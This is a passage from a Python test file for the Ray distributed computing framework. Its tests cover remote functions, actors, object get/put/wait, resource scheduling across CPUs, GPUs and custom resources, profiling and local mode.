assert ray.get(f2.remote(1, 2, 3)) == (1, 2, (3, ))
assert ray.get(f2.remote(1, 2, 3, 4)) == (1, 2, (3, 4))
def testNoArgs(self):
@ray.remote
def no_op():
pass
self.ray_start()
ray.get(no_op.remote())
def test_defining_remote_functions(shutdown_only):
ray.init(num_cpus=3)
# Test that we can define a remote function in the shell.
@ray.remote
def f(x):
return x + 1
assert ray.get(f.remote(0)) == 1
# Test that we can redefine the remote function.
@ray.remote
def f(x):
return x + 10
while True:
val = ray.get(f.remote(0))
assert val in [1, 10]
if val == 10:
break
else:
logger.info("Still using old definition of f, trying again.")
# Test that we can close over plain old data.
data = [
np.zeros([3, 5]), (1, 2, "a"), [0.0, 1.0, 1 << 62], 1 << 60, {
"a": np.zeros(3)
}
]
@ray.remote
def g():
return data
ray.get(g.remote())
# Test that we can close over modules.
@ray.remote
def h():
return np.zeros([3, 5])
assert np.alltrue(ray.get(h.remote()) == np.zeros([3, 5]))
@ray.remote
def j():
return time.time()
ray.get(j.remote())
# Test that we can define remote functions that call other remote
# functions.
@ray.remote
def k(x):
return x + 1
@ray.remote
def k2(x):
return ray.get(k.remote(x))
@ray.remote
def m(x):
return ray.get(k2.remote(x))
assert ray.get(k.remote(1)) == 2
assert ray.get(k2.remote(1)) == 2
assert ray.get(m.remote(1)) == 2
def test_submit_api(shutdown_only):
ray.init(num_cpus=2, num_gpus=1, resources={"Custom": 1})
@ray.remote
def f(n):
return list(range(n))
@ray.remote
def g():
return ray.get_gpu_ids()
assert f._remote([0], num_return_vals=0) is None
id1 = f._remote(args=[1], num_return_vals=1)
assert ray.get(id1) == [0]
id1, id2 = f._remote(args=[2], num_return_vals=2)
assert ray.get([id1, id2]) == [0, 1]
id1, id2, id3 = f._remote(args=[3], num_return_vals=3)
assert ray.get([id1, id2, id3]) == [0, 1, 2]
assert ray.get(
g._remote(args=[], num_cpus=1, num_gpus=1,
resources={"Custom": 1})) == [0]
infeasible_id = g._remote(args=[], resources={"NonexistentCustom": 1})
assert ray.get(g._remote()) == []
ready_ids, remaining_ids = ray.wait([infeasible_id], timeout=0.05)
assert len(ready_ids) == 0
assert len(remaining_ids) == 1
@ray.remote
class Actor(object):
def __init__(self, x, y=0):
self.x = x
self.y = y
def method(self, a, b=0):
return self.x, self.y, a, b
def gpu_ids(self):
return ray.get_gpu_ids()
@ray.remote
class Actor2(object):
def __init__(self):
pass
def method(self):
pass
a = Actor._remote(
args=[0], kwargs={"y": 1}, num_gpus=1, resources={"Custom": 1})
a2 = Actor2._remote()
ray.get(a2.method._remote())
id1, id2, id3, id4 = a.method._remote(
args=["test"], kwargs={"b": 2}, num_return_vals=4)
assert ray.get([id1, id2, id3, id4]) == [0, 1, "test", 2]
def test_many_fractional_resources(shutdown_only):
ray.init(num_cpus=2, num_gpus=2, resources={"Custom": 2})
@ray.remote
def g():
return 1
@ray.remote
def f(block, accepted_resources):
true_resources = {
resource: value[0][1]
for resource, value in ray.get_resource_ids().items()
}
if block:
ray.get(g.remote())
return true_resources == accepted_resources
# Check that the resource are assigned correctly.
result_ids = []
for rand1, rand2, rand3 in np.random.uniform(size=(100, 3)):
resource_set = {"CPU": int(rand1 * 10000) / 10000}
result_ids.append(f._remote([False, resource_set], num_cpus=rand1))
resource_set = {"CPU": 1, "GPU": int(rand1 * 10000) / 10000}
result_ids.append(f._remote([False, resource_set], num_gpus=rand1))
resource_set = {"CPU": 1, "Custom": int(rand1 * 10000) / 10000}
result_ids.append(
f._remote([False, resource_set], resources={"Custom": rand1}))
resource_set = {
"CPU": int(rand1 * 10000) / 10000,
"GPU": int(rand2 * 10000) / 10000,
"Custom": int(rand3 * 10000) / 10000
}
result_ids.append(
f._remote(
[False, resource_set],
num_cpus=rand1,
num_gpus=rand2,
resources={"Custom": rand3}))
result_ids.append(
f._remote(
[True, resource_set],
num_cpus=rand1,
num_gpus=rand2,
resources={"Custom": rand3}))
assert all(ray.get(result_ids))
# Check that the available resources at the end are the same as the
# beginning.
stop_time = time.time() + 10
correct_available_resources = False
while time.time() < stop_time:
if (ray.available_resources()["CPU"] == 2.0
and ray.available_resources()["GPU"] == 2.0
and ray.available_resources()["Custom"] == 2.0):
correct_available_resources = True
break
if not correct_available_resources:
assert False, "Did not get correct available resources."
def test_get_multiple(ray_start_regular):
object_ids = [ray.put(i) for i in range(10)]
assert ray.get(object_ids) == list(range(10))
# Get a random choice of object IDs with duplicates.
indices = list(np.random.choice(range(10), 5))
indices += indices
results = ray.get([object_ids[i] for i in indices])
assert results == indices
def test_get_multiple_experimental(ray_start_regular):
object_ids = [ray.put(i) for i in range(10)]
object_ids_tuple = tuple(object_ids)
assert ray.experimental.get(object_ids_tuple) == list(range(10))
object_ids_nparray = np.array(object_ids)
assert ray.experimental.get(object_ids_nparray) == list(range(10))
def test_get_dict(ray_start_regular):
d = {str(i): ray.put(i) for i in range(5)}
for i in range(5, 10):
d[str(i)] = i
result = ray.experimental.get(d)
expected = {str(i): i for i in range(10)}
assert result == expected
def test_wait(ray_start_regular):
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
ready_ids, remaining_ids = ray.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
ready_ids, remaining_ids = ray.wait(objectids, num_returns=4)
assert set(ready_ids) == set(objectids)
assert remaining_ids == []
objectids = [f.remote(0.5), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=1.75, num_returns=4)
assert time.time() - start_time < 2
assert len(ready_ids) == 3
assert len(remaining_ids) == 1
ray.wait(objectids)
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=5.0)
assert time.time() - start_time < 5
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
# Verify that calling wait with duplicate object IDs throws an
# exception.
x = ray.put(1)
with pytest.raises(Exception):
ray.wait([x, x])
# Make sure it is possible to call wait with an empty list.
ready_ids, remaining_ids = ray.wait([])
assert ready_ids == []
assert remaining_ids == []
# Test semantics of num_returns with no timeout.
oids = [ray.put(i) for i in range(10)]
(found, rest) = ray.wait(oids, num_returns=2)
assert len(found) == 2
assert len(rest) == 8
# Verify that incorrect usage raises a TypeError.
x = ray.put(1)
with pytest.raises(TypeError):
ray.wait(x)
with pytest.raises(TypeError):
ray.wait(1)
with pytest.raises(TypeError):
ray.wait([1])
def test_wait_iterables(ray_start_regular):
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = (f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5))
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
objectids = np.array(
[f.remote(1.0),
f.remote(0.5),
f.remote(0.5),
f.remote(0.5)])
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
def test_multiple_waits_and_gets(shutdown_only):
# It is important to use three workers here, so that the three tasks
# launched in this experiment can run at the same time.
ray.init(num_cpus=3)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
@ray.remote
def g(l):
# The argument l should be a list containing one object ID.
ray.wait([l[0]])
@ray.remote
def h(l):
# The argument l should be a list containing one object ID.
ray.get(l[0])
# Make sure that multiple wait requests involving the same object ID
# all return.
x = f.remote(1)
ray.get([g.remote([x]), g.remote([x])])
# Make sure that multiple get requests involving the same object ID all
# return.
x = f.remote(1)
ray.get([h.remote([x]), h.remote([x])])
def test_caching_functions_to_run(shutdown_only):
# Test that we export functions to run on all workers before the driver
# is connected.
def f(worker_info):
sys.path.append(1)
ray.worker.global_worker.run_function_on_all_workers(f)
def f(worker_info):
sys.path.append(2)
ray.worker.global_worker.run_function_on_all_workers(f)
def g(worker_info):
sys.path.append(3)
ray.worker.global_worker.run_function_on_all_workers(g)
def f(worker_info):
sys.path.append(4)
ray.worker.global_worker.run_function_on_all_workers(f)
ray.init(num_cpus=1)
@ray.remote
def get_state():
time.sleep(1)
return sys.path[-4], sys.path[-3], sys.path[-2], sys.path[-1]
res1 = get_state.remote()
res2 = get_state.remote()
assert ray.get(res1) == (1, 2, 3, 4)
assert ray.get(res2) == (1, 2, 3, 4)
# Clean up the path on the workers.
def f(worker_info):
sys.path.pop()
sys.path.pop()
sys.path.pop()
sys.path.pop()
ray.worker.global_worker.run_function_on_all_workers(f)
def test_running_function_on_all_workers(ray_start_regular):
def f(worker_info):
sys.path.append("fake_directory")
ray.worker.global_worker.run_function_on_all_workers(f)
@ray.remote
def get_path1():
return sys.path
assert "fake_directory" == ray.get(get_path1.remote())[-1]
def f(worker_info):
sys.path.pop(-1)
ray.worker.global_worker.run_function_on_all_workers(f)
# Create a second remote function to guarantee that when we call
# get_path2.remote(), the second function to run will have been run on
# the worker.
@ray.remote
def get_path2():
return sys.path
assert "fake_directory" not in ray.get(get_path2.remote())
def test_profiling_api(ray_start_2_cpus):
@ray.remote
def f():
with ray.profile("custom_event", extra_data={"name": "custom name"}):
pass
ray.put(1)
object_id = f.remote()
ray.wait([object_id])
ray.get(object_id)
# Wait until all of the profiling information appears in the profile
# table.
timeout_seconds = 20
start_time = time.time()
while True:
profile_data = ray.timeline()
event_types = {event["cat"] for event in profile_data}
expected_types = [
"worker_idle",
"task",
"task:deserialize_arguments",
"task:execute",
"task:store_outputs",
"wait_for_function",
"ray.get",
"ray.put",
"ray.wait",
"submit_task",
"fetch_and_run_function",
"register_remote_function",
"custom_event", # This is the custom one from ray.profile.
]
if all(expected_type in event_types
for expected_type in expected_types):
break
if time.time() - start_time > timeout_seconds:
raise RayTestTimeoutException(
"Timed out while waiting for information in "
"profile table. Missing events: {}.".format(
set(expected_types) - set(event_types)))
# The profiling information only flushes once every second.
time.sleep(1.1)
def test_wait_cluster(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
ray.init(address=cluster.address)
@ray.remote(resources={"RemoteResource": 1})
def f():
return
# Make sure we have enough workers on the remote nodes to execute some
# tasks.
tasks = [f.remote() for _ in range(10)]
start = time.time()
ray.get(tasks)
end = time.time()
# Submit some more tasks that can only be executed on the remote nodes.
tasks = [f.remote() for _ in range(10)]
# Sleep for a bit to let the tasks finish.
time.sleep((end - start) * 2)
_, unready = ray.wait(tasks, num_returns=len(tasks), timeout=0)
# All remote tasks should have finished.
assert len(unready) == 0
def test_object_transfer_dump(ray_start_cluster):
cluster = ray_start_cluster
num_nodes = 3
for i in range(num_nodes):
cluster.add_node(resources={str(i): 1}, object_store_memory=10**9)
ray.init(address=cluster.address)
@ray.remote
def f(x):
return
# These objects will live on different nodes.
object_ids = [
f._remote(args=[1], resources={str(i): 1}) for i in range(num_nodes)
]
# Broadcast each object from each machine to each other machine.
for object_id in object_ids:
ray.get([
f._remote(args=[object_id], resources={str(i): 1})
for i in range(num_nodes)
])
# The profiling information only flushes once every second.
time.sleep(1.1)
transfer_dump = ray.object_transfer_timeline()
# Make sure the transfer dump can be serialized with JSON.
json.loads(json.dumps(transfer_dump))
assert len(transfer_dump) >= num_nodes**2
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_receive"
}) == num_nodes
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_send"
}) == num_nodes
def test_identical_function_names(ray_start_regular):
# Define a bunch of remote functions and make sure that we don't
# accidentally call an older version.
num_calls = 200
@ray.remote
def f():
return 1
results1 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 2
results2 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 3
results3 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 4
results4 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 5
results5 = [f.remote() for _ in range(num_calls)]
assert ray.get(results1) == num_calls * [1]
assert ray.get(results2) == num_calls * [2]
assert ray.get(results3) == num_calls * [3]
assert ray.get(results4) == num_calls * [4]
assert ray.get(results5) == num_calls * [5]
@ray.remote
def g():
return 1
@ray.remote # noqa: F811
def g():
return 2
@ray.remote # noqa: F811
def g():
return 3
@ray.remote # noqa: F811
def g():
return 4
@ray.remote # noqa: F811
def g():
return 5
result_values = ray.get([g.remote() for _ in range(num_calls)])
assert result_values == num_calls * [5]
def test_illegal_api_calls(ray_start_regular):
# Verify that we cannot call put on an ObjectID.
x = ray.put(1)
with pytest.raises(Exception):
ray.put(x)
# Verify that we cannot call get on a regular value.
with pytest.raises(Exception):
ray.get(3)
# TODO(hchen): This test currently doesn't work in Python 2. This is likely
# because plasma client isn't thread-safe. This needs to be fixed from the
# Arrow side. See #4107 for relevant discussions.
@pytest.mark.skipif(six.PY2, reason="Doesn't work in Python 2.")
def test_multithreading(ray_start_2_cpus):
# This test requires at least 2 CPUs to finish since the worker does not
# release resources when joining the threads.
def run_test_in_multi_threads(test_case, num_threads=10, num_repeats=25):
"""A helper function that runs test cases in multiple threads."""
def wrapper():
for _ in range(num_repeats):
test_case()
time.sleep(random.randint(0, 10) / 1000.0)
return "ok"
executor = ThreadPoolExecutor(max_workers=num_threads)
futures = [executor.submit(wrapper) for _ in range(num_threads)]
for future in futures:
assert future.result() == "ok"
@ray.remote
def echo(value, delay_ms=0):
if delay_ms > 0:
time.sleep(delay_ms / 1000.0)
return value
@ray.remote
class Echo(object):
def echo(self, value):
return value
def test_api_in_multi_threads():
"""Test using Ray api in multiple threads."""
# Test calling remote functions in multiple threads.
def test_remote_call():
value = random.randint(0, 1000000)
result = ray.get(echo.remote(value))
assert value == result
run_test_in_multi_threads(test_remote_call)
# Test multiple threads calling one actor.
actor = Echo.remote()
def test_call_actor():
value = random.randint(0, 1000000)
result = ray.get(actor.echo.remote(value))
assert value == result
run_test_in_multi_threads(test_call_actor)
# Test put and get.
def test_put_and_get():
value = random.randint(0, 1000000)
result = ray.get(ray.put(value))
assert value == result
run_test_in_multi_threads(test_put_and_get)
# Test multiple threads waiting for objects.
num_wait_objects = 10
objects = [
echo.remote(i, delay_ms=10) for i in range(num_wait_objects)
]
def test_wait():
ready, _ = ray.wait(
objects,
num_returns=len(objects),
timeout=1000.0,
)
assert len(ready) == num_wait_objects
assert ray.get(ready) == list(range(num_wait_objects))
run_test_in_multi_threads(test_wait, num_repeats=1)
# Run tests in a driver.
test_api_in_multi_threads()
# Run tests in a worker.
@ray.remote
def run_tests_in_worker():
test_api_in_multi_threads()
return "ok"
assert ray.get(run_tests_in_worker.remote()) == "ok"
# Test actor that runs background threads.
@ray.remote
class MultithreadedActor(object):
def __init__(self):
self.lock = threading.Lock()
self.thread_results = []
def background_thread(self, wait_objects):
try:
# Test wait
ready, _ = ray.wait(
wait_objects,
num_returns=len(wait_objects),
timeout=1000.0,
)
assert len(ready) == len(wait_objects)
for _ in range(20):
num = 10
# Test remote call
results = [echo.remote(i) for i in range(num)]
assert ray.get(results) == list(range(num))
# Test put and get
objects = [ray.put(i) for i in range(num)]
assert ray.get(objects) == list(range(num))
time.sleep(random.randint(0, 10) / 1000.0)
except Exception as e:
with self.lock:
self.thread_results.append(e)
else:
with self.lock:
self.thread_results.append("ok")
def spawn(self):
wait_objects = [echo.remote(i, delay_ms=10) for i in range(10)]
self.threads = [
threading.Thread(
target=self.background_thread, args=(wait_objects, ))
for _ in range(20)
]
[thread.start() for thread in self.threads]
def join(self):
[thread.join() for thread in self.threads]
assert self.thread_results == ["ok"] * len(self.threads)
return "ok"
actor = MultithreadedActor.remote()
actor.spawn.remote()
ray.get(actor.join.remote()) == "ok"
def test_free_objects_multi_node(ray_start_cluster):
# This test will do following:
# 1. Create 3 raylets that each hold an actor.
# 2. Each actor creates an object which is the deletion target.
# 3. Wait 0.1 second for the objects to be deleted.
# 4. Check that the deletion targets have been deleted.
# Caution: if remote functions are used instead of actor methods,
# one raylet may create more than one worker to execute the
# tasks, so the flushing operations may be executed in different
# workers and the plasma client holding the deletion target
# may not be flushed.
cluster = ray_start_cluster
config = json.dumps({"object_manager_repeated_push_delay_ms": 1000})
for i in range(3):
cluster.add_node(
num_cpus=1,
resources={"Custom{}".format(i): 1},
_internal_config=config)
ray.init(address=cluster.address)
class RawActor(object):
def get(self):
return ray.worker.global_worker.node.unique_id
ActorOnNode0 = ray.remote(resources={"Custom0": 1})(RawActor)
ActorOnNode1 = ray.remote(resources={"Custom1": 1})(RawActor)
ActorOnNode2 = ray.remote(resources={"Custom2": 1})(RawActor)
def create(actors):
a = actors[0].get.remote()
b = actors[1].get.remote()
c = actors[2].get.remote()
(l1, l2) = ray.wait([a, b, c], num_returns=3)
assert len(l1) == 3
assert len(l2) == 0
return (a, b, c)
def run_one_test(actors, local_only, delete_creating_tasks):
(a, b, c) = create(actors)
# The three objects should be generated on different object stores.
assert ray.get(a) != ray.get(b)
assert ray.get(a) != ray.get(c)
assert ray.get(c) != ray.get(b)
ray.internal.free(
[a, b, c],
local_only=local_only,
delete_creating_tasks=delete_creating_tasks)
# Wait for the objects to be deleted.
time.sleep(0.1)
return (a, b, c)
actors = [
ActorOnNode0.remote(),
ActorOnNode1.remote(),
ActorOnNode2.remote()
]
# Case 1: run this local_only=False. All 3 objects will be deleted.
(a, b, c) = run_one_test(actors, False, False)
(l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=1)
# All the objects are deleted.
assert len(l1) == 0
assert len(l2) == 3
# Case 2: run this local_only=True. Only 1 object will be deleted.
(a, b, c) = run_one_test(actors, True, False)
(l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=3)
# One object is deleted and 2 objects are not.
assert len(l1) == 2
assert len(l2) == 1
# The deleted object will have the same store with the driver.
local_return = ray.worker.global_worker.node.unique_id
for object_id in l1:
assert ray.get(object_id) != local_return
# Case3: These cases test the deleting creating tasks for the object.
(a, b, c) = run_one_test(actors, False, False)
task_table = ray.tasks()
for obj in [a, b, c]:
assert ray._raylet.compute_task_id(obj).hex() in task_table
(a, b, c) = run_one_test(actors, False, True)
task_table = ray.tasks()
for obj in [a, b, c]:
assert ray._raylet.compute_task_id(obj).hex() not in task_table
def test_local_mode(shutdown_only):
@ray.remote
def local_mode_f():
return np.array([0, 0])
@ray.remote
def local_mode_g(x):
x[0] = 1
return x
ray.init(local_mode=True)
@ray.remote
def f():
return np.ones([3, 4, 5])
xref = f.remote()
# Remote functions should return ObjectIDs.
assert isinstance(xref, ray.ObjectID)
assert np.alltrue(ray.get(xref) == np.ones([3, 4, 5]))
y = np.random.normal(size=[11, 12])
# Check that ray.get(ray.put) is the identity.
assert np.alltrue(y == ray.get(ray.put(y)))
# Make sure objects are immutable, this example is why we need to copy
# arguments before passing them into remote functions in python mode
aref = local_mode_f.remote()
assert np.alltrue(ray.get(aref) == np.array([0, 0]))
bref = local_mode_g.remote(ray.get(aref))
# Make sure local_mode_g does not mutate aref.
assert np.alltrue(ray.get(aref) == np.array([0, 0]))
assert np.alltrue(ray.get(bref) == np.array([1, 0]))
# wait should return the first num_returns values passed in as the
# first list and the remaining values as the second list
num_returns = 5
object_ids = [ray.put(i) for i in range(20)]
ready, remaining = ray.wait(
object_ids, num_returns=num_returns, timeout=None)
assert ready == object_ids[:num_returns]
assert remaining == object_ids[num_returns:]
# Check that ray.put() and ray.internal.free() work in local mode.
v1 = np.ones(10)
v2 = np.zeros(10)
k1 = ray.put(v1)
assert np.alltrue(v1 == ray.get(k1))
k2 = ray.put(v2)
assert np.alltrue(v2 == ray.get(k2))
ray.internal.free([k1, k2])
with pytest.raises(Exception):
ray.get(k1)
with pytest.raises(Exception):
ray.get(k2)
# Should fail silently.
ray.internal.free([k1, k2])
# Test actors in LOCAL_MODE.
@ray.remote
class LocalModeTestClass(object):
def __init__(self, array):
self.array = array
def set_array(self, array):
self.array = array
def get_array(self):
return self.array
def modify_and_set_array(self, array):
array[0] = -1
self.array = array
@ray.method(num_return_vals=3)
def returns_multiple(self):
return 1, 2, 3
test_actor = LocalModeTestClass.remote(np.arange(10))
obj = test_actor.get_array.remote()
assert isinstance(obj, ray.ObjectID)
assert np.alltrue(ray.get(obj) == np.arange(10))
test_array = np.arange(10)
# Remote actor functions should not mutate arguments
test_actor.modify_and_set_array.remote(test_array)
assert np.alltrue(test_array == np.arange(10))
# Remote actor functions should keep state
test_array[0] = -1
assert np.alltrue(test_array == ray.get(test_actor.get_array.remote()))
# Check that actor handles work in local mode.
@ray.remote
def use_actor_handle(handle):
array = np.ones(10)
handle.set_array.remote(array)
assert np.alltrue(array == ray.get(handle.get_array.remote()))
ray.get(use_actor_handle.remote(test_actor))
# Check that exceptions are deferred until ray.get().
exception_str = "test_basic remote task exception"
@ray.remote
def throws():
raise Exception(exception_str)
obj = throws.remote()
with pytest.raises(Exception, match=exception_str):
ray.get(obj)
# Check that multiple return values are handled properly.
@ray.remote(num_return_vals=3)
def returns_multiple():
return 1, 2, 3
obj1, obj2, obj3 = returns_multiple.remote()
assert ray.get(obj1) == 1
assert ray.get(obj2) == 2
assert ray.get(obj3) == 3
assert ray.get([obj1, obj2, obj3]) == [1, 2, 3]
obj1, obj2, obj3 = test_actor.returns_multiple.remote()
assert ray.get(obj1) == 1
assert ray.get(obj2) == 2
assert ray.get(obj3) == 3
assert ray.get([obj1, obj2, obj3]) == [1, 2, 3]
@ray.remote(num_return_vals=2)
def returns_multiple_throws():
raise Exception(exception_str)
obj1, obj2 = returns_multiple_throws.remote()
with pytest.raises(Exception, match=exception_str):
ray.get(obj)
ray.get(obj1)
with pytest.raises(Exception, match=exception_str):
ray.get(obj2)
# Check that Actors are not overwritten by remote calls from different
# classes.
@ray.remote
class RemoteActor1(object):
def __init__(self):
pass
def function1(self):
return 0
@ray.remote
class RemoteActor2(object):
def __init__(self):
pass
def function2(self):
return 1
actor1 = RemoteActor1.remote()
_ = RemoteActor2.remote()
assert ray.get(actor1.function1.remote()) == 0
def test_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=2)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
time_buffer = 2
# At most 10 copies of this can run at once.
@ray.remote(num_cpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(10)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(11)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_cpus=3)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_gpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(2)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_multi_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=10)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
@ray.remote(num_cpus=1, num_gpus=9)
def f(n):
time.sleep(n)
@ray.remote(num_cpus=9, num_gpus=1)
def g(n):
time.sleep(n)
time_buffer = 2
start_time = time.time()
ray.get([f.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5), g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_gpu_ids(shutdown_only):
num_gpus = 10
ray.init(num_cpus=10, num_gpus=num_gpus)
def get_gpu_ids(num_gpus_per_worker):
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == num_gpus_per_worker
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
f0 = ray.remote(num_gpus=0)(lambda: get_gpu_ids(0))
f1 = ray.remote(num_gpus=1)(lambda: get_gpu_ids(1))
f2 = ray.remote(num_gpus=2)(lambda: get_gpu_ids(2))
f4 = ray.remote(num_gpus=4)(lambda: get_gpu_ids(4))
f5 = ray.remote(num_gpus=5)(lambda: get_gpu_ids(5))
# Wait for all workers to start up.
@ray.remote
def f():
time.sleep(0.1)
return os.getpid()
start_time = time.time()
while True:
if len(set(ray.get([f.remote() for _ in range(10)]))) == 10:
break
if time.time() > start_time + 10:
raise RayTestTimeoutException(
"Timed out while waiting for workers to start "
"up.")
list_of_ids = ray.get([f0.remote() for _ in range(10)])
assert list_of_ids == 10 * [[]]
list_of_ids = ray.get([f1.remote() for _ in range(10)])
set_of_ids = {tuple(gpu_ids) for gpu_ids in list_of_ids}
assert set_of_ids == {(i, ) for i in range(10)}
list_of_ids = ray.get([f2.remote(), f4.remote(), f4.remote()])
all_ids = [gpu_id for gpu_ids in list_of_ids for gpu_id in gpu_ids]
assert set(all_ids) == set(range(10))
# There are only 10 GPUs, and each task uses 5 GPUs, so there should only
# be 2 tasks scheduled at a given time.
t1 = time.time()
ray.get([f5.remote() for _ in range(20)])
assert time.time() - t1 >= 10 * 0.1
# Test that actors have CUDA_VISIBLE_DEVICES set properly.
@ray.remote
class Actor0(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
@ray.remote(num_gpus=1)
class Actor1(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
a0 = Actor0.remote()
ray.get(a0.test.remote())
a1 = Actor1.remote()
ray.get(a1.test.remote())
def test_zero_cpus(shutdown_only):
ray.init(num_cpus=0)
# We should be able to execute a task that requires 0 CPU resources.
@ray.remote(num_cpus=0)
def f():
return 1
ray.get(f.remote())
# We should be able to create an actor that requires 0 CPU resources.
@ray.remote(num_cpus=0)
class Actor(object):
def method(self):
pass
a = Actor.remote()
x = a.method.remote()
ray.get(x)
def test_zero_cpus_actor(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=0)
cluster.add_node(num_cpus=2)
ray.init(address=cluster.address)
node_id = ray.worker.global_worker.node.unique_id
@ray.remote
class Foo(object):
def method(self):
return ray.worker.global_worker.node.unique_id
# Make sure tasks and actors run on the remote raylet.
a = Foo.remote()
assert ray.get(a.method.remote()) != node_id
def test_fractional_resources(shutdown_only):
ray.init(num_cpus=6, num_gpus=3, resources={"Custom": 1})
@ray.remote(num_gpus=0.5)
class Foo1(object):
def method(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
return gpu_ids[0]
foos = [Foo1.remote() for _ in range(6)]
gpu_ids = ray.get([f.method.remote() for f in foos])
for i in range(3):
assert gpu_ids.count(i) == 2
del foos
@ray.remote
class Foo2(object):
def method(self):
pass
# Create an actor that requires 0.7 of the custom resource.
f1 = Foo2._remote([], {}, resources={"Custom": 0.7})
ray.get(f1.method.remote())
# Make sure that we cannot create an actor that requires 0.7 of the
# custom resource. TODO(rkn): Re-enable this once ray.wait is
# implemented.
f2 = Foo2._remote([], {}, resources={"Custom": 0.7})
ready, _ = ray.wait([f2.method.remote()], timeout=0.5)
assert len(ready) == 0
# Make sure we can start an actor that requries only 0.3 of the custom
# resource.
f3 = Foo2._remote([], {}, resources={"Custom": 0.3})
ray.get(f3.method.remote())
del f1, f3
# Make sure that we get exceptions if we submit tasks that require a
# fractional number of resources greater than 1.
@ray.remote(num_cpus=1.5)
def test():
pass
with pytest.raises(ValueError):
test.remote()
with pytest.raises(ValueError):
Foo2._remote([], {}, resources={"Custom": 1.5})
def test_multiple_raylets(ray_start_cluster):
# This test will define a bunch of tasks that can only be assigned to
# specific raylets, and we will check that they are assigned
# to the correct raylets.
cluster = ray_start_cluster
cluster.add_node(num_cpus=11, num_gpus=0)
cluster.add_node(num_cpus=5, num_gpus=5)
cluster.add_node(num_cpus=10, num_gpus=1)
ray.init(address=cluster.address)
cluster.wait_for_nodes()
